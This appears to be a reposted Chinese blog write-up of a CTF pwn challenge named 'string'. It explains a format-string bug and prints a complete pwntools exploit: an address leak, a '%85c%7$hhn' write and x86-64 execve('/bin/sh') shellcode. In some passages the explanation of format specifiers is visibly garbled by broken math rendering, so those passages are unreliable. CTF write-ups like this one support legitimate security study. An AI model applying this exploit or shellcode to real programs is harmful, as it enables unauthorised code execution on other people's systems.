博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
[fmt+shellcode]string
阅读量:2134 次
发布时间:2019-04-30

本文共 1742 字,大约阅读时间需要 5 分钟。

[fmt+shellcode]string

1. ida分析

  1. main函数分析

    在这里插入图片描述

  2. 看函数执行流程

    在这里插入图片描述

在这里插入图片描述

  • 通过

    aaaa.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p得到format的偏移,再v2在format上面一个字节,就得到的v2的偏移

    在这里插入图片描述

  • 再通过任意写

    %85c%7$hhn 将85写到v2的最低位的字节
    1. %c:输出字符,配上%n可用于向指定地址写数据。
    2. %d:输出十进制整数,配上%n可用于向指定地址写数据。
    3. %x:输出16进制数据,如%i x 表 示 要 泄 漏 偏 移 i 处 4 字 节 长 的 16 进 制 数 据 , x表示要泄漏偏移i处4字节长的16进制数据,%i xi416lx表示要泄漏偏移i处8字节长的16进制数据,32bit和64bit环境下一样。
    4. %p:输出16进制数据,与%x基本一样,只是附加了前缀0x,在32bit下输出4字节,在64bit下输出8字节,可通过输出字节的长度来判断目标环境是32bit还是64bit。
    5. %s:输出的内容是字符串,即将偏移处指针指向的字符串输出,如%i$s表示输出偏移i处地址所指向的字符串,在32bit和64bit环境下一样,可用于读取GOT表等信息。
    6. %n:将%n之前printf已经打印的字符个数赋值给偏移处指针所指向的地址位置,如%100x%10 n 表 示 将 0 x 64 写 入 偏 移 10 处 保 存 的 指 针 所 指 向 的 地 址 ( 4 字 节 ) , 而 n表示将0x64写入偏移10处保存的指针所指向的地址(4字节),而% n0x64104hn表示写入的地址空间为2字节,% h h n 表 示 写 入 的 地 址 空 间 为 1 字 节 , hhn表示写入的地址空间为1字节,% hhn1lln表示写入的地址空间为8字节,在32bit和64bit环境下一样。有时,直接写4字节会导致程序崩溃或等候时间过长,可以通过% h n 或 hn或% hnhhn来适时调整。
  1. shellcode得以执行

    在这里插入图片描述

2. 思路

  • ida分析过程中已解决

3. exp

from pwn import *#p = remote()p = process('./string')elf = ELF('./string')context.arch = elf.archp.recvuntil('secret[0] is ')addr1 = int(p.recvuntil('\n')[:-1],16)log.success('addr1==>'+hex(addr1))p.recvuntil('secret[1] is ')addr2 = int(p.recv(7),16)log.success('addr2==>'+hex(addr2))context.log_level = 'debug'p.sendlineafter('What should your character\'s name be:','huzai')p.sendlineafter('So, where you will go?east or up?:\n','east')p.sendlineafter('go into there(1), or leave(0)?:\n','1')p.sendlineafter('\'Give me an address\'\n',str(addr1))p.sendlineafter('And, you wish is:\n','%85c%7$hhn')shellcode = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"p.sendline(shellcode)#pwtools shellcode#p.sendline(asm(shellcraft.sh()))gdb.attach(p)p.interactive()

转载地址:http://qtugf.baihongyu.com/

你可能感兴趣的文章
[Kick Start 2020] Round A 1.Allocation
查看>>
Leetcode C++ 《第181场周赛-1》 5364. 按既定顺序创建目标数组
查看>>
Leetcode C++ 《第181场周赛-2》 1390. 四因数
查看>>
阿里云《云原生》公开课笔记 第一章 云原生启蒙
查看>>
阿里云《云原生》公开课笔记 第二章 容器基本概念
查看>>
阿里云《云原生》公开课笔记 第三章 kubernetes核心概念
查看>>
阿里云《云原生》公开课笔记 第四章 理解Pod和容器设计模式
查看>>
阿里云《云原生》公开课笔记 第五章 应用编排与管理
查看>>
阿里云《云原生》公开课笔记 第六章 应用编排与管理:Deployment
查看>>
阿里云《云原生》公开课笔记 第七章 应用编排与管理:Job和DaemonSet
查看>>
阿里云《云原生》公开课笔记 第八章 应用配置管理
查看>>
阿里云《云原生》公开课笔记 第九章 应用存储和持久化数据卷:核心知识
查看>>
linux系统 阿里云源
查看>>
国内外helm源记录
查看>>
牛客网题目1:最大数
查看>>
散落人间知识点记录one
查看>>
Leetcode C++ 随手刷 547.朋友圈
查看>>
手抄笔记:深入理解linux内核-1
查看>>
内存堆与栈
查看>>
Leetcode C++《每日一题》20200621 124.二叉树的最大路径和
查看>>